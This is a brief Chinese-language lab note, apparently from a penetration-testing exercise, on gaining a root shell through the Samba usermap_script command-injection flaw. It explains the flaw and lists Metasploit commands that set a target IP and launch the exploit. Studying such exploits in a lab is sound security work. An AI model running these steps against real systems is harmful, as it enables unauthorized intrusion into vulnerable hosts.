目的
利用Samba漏洞,获得目标主机root权限.
原理
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445.
步骤
- 如前面几个:扫端口,看服务,查版本,找漏洞.
- 依次执行:
msfconsole --> search samba --> use exploit/multi/samba/usermap_script --> info --> set RHOST 192.168.1.3(目标ip) --> exploit --> whoami(输入命令getshell)